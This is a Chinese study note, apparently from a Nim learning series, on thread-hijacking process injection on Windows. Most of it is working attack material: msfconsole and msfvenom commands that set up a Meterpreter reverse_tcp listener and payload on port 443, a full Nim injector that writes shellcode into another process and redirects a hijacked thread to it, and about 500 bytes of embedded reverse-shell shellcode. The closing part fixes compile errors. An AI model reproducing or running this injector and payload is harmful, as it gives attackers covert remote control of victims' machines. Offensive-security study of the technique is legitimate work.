Injecting to Remote Process via Thread Hijacking(nim学习系列)
Injecting to Remote Process via Thread Hijacking
metasploit
监听 metasplit
msfconsole -x "use exploits/multi/handler; set lhost 192.168.0.101; set lport 443; set payload windows/x64/meterpreter/reverse_tcp; exploit"
生成 shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=443 -f csharp
其他命令
msfvenom -l payloads | grep reverse_tcp
msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options
poc.nim
import winim
proc myThread(shellcode: openArray[byte]) =
var targetProcessHandle: HANDLE
var remoteBuffer: PVOID
var threadHijacked: HANDLE
var snapshot: HANDLE
var threadEntry: THREADENTRY32
var context: CONTEXT
#(Start-Process notepad -PassThru).id
var targetPID: DWORD = 19512
context.ContextFlags = CONTEXT_FULL
#threadEntry.dwSize = sizeof(THREADENTRY32).int32
#threadEntry.dwSize = int32(sizeof(THREADENTRY32))
threadEntry.dwSize = cast[DWORD](sizeof(THREADENTRY32))
targetProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID)
remoteBuffer = VirtualAllocEx(targetProcessHandle, NULL, len(shellcode), MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
WriteProcessMemory(targetProcessHandle, remoteBuffer, unsafeAddr shellcode, len(shellcode), NULL)
snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0)
Thread32First(snapshot, &threadEntry)
#Thread32First(snapshot, addr threadEntry)
while Thread32Next(snapshot, &threadEntry):
if threadEntry.th32OwnerProcessID == targetPID:
threadHijacked = OpenThread(THREAD_ALL_ACCESS, FALSE, threadEntry.th32ThreadID)
echo threadEntry.th32ThreadID
break
SuspendThread(threadHijacked)
GetThreadContext(threadHijacked, &context)
context.Rip = cast[DWORD_PTR](remoteBuffer)
SetThreadContext(threadHijacked, &context)
ResumeThread(threadHijacked)
when defined(windows):
when defined(amd64):
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=443 -f csharp, then modified for Nim arrays
echo "[*] Running in x64 process"
var shellcode: array[510, byte] = [
byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,
0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x48,0x31,
0xd2,0x65,0x48,0x8b,0x52,0x60,0x56,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x0f,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,
0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,
0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0x8b,0x48,0x18,
0xe3,0x56,0x4d,0x31,0xc9,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,
0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,0x0d,0xac,0x41,
0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
0x41,0x8b,0x04,0x88,0x41,0x58,0x48,0x01,0xd0,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,
0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,
0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,
0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x01,0xbb,
0xc0,0xa8,0x00,0x65,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,
0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,
0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,
0xd5,0x6a,0x0a,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,
0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,
0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,
0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,
0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,
0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,
0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,
0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,
0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,
0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,
0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,
0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,
0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,
0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,
0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,
0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,
0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,
0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,
0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5]
# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
myThread(shellcode)
编译错误
第一个错误
报错信息:
Error: type mismatch: got 'int' for '28' but expected 'DWORD = int32'
数字类型转换通过使用类型来执行:
var
x: int32 = 1.int32 # 与调用int32(1)相同
原来 C 语言的写法
threadEntry.dwSize = sizeof(THREADENTRY32)
nim 语言的写法
threadEntry.dwSize = sizeof(THREADENTRY32).int32
#或者
threadEntry.dwSize = int32(sizeof(THREADENTRY32))
#或者
threadEntry.dwSize = cast[DWORD](sizeof(THREADENTRY32))
第二个错误
Error: undeclared field: 'Rip=' for type windef.CONTEXT [type declared in C:\Users\user\.nimble\pkgs\winim-3.9.0\winim\inc\windef.nim(547, 5)]
RIP是x64下指令指针寄存器,所以应该这样编译
nim c --cpu:amd64 -r poc.nim
引用
https://www.ired.team/offensive-security/code-injection-process-injection/injecting-to-remote-process-via-thread-hijacking
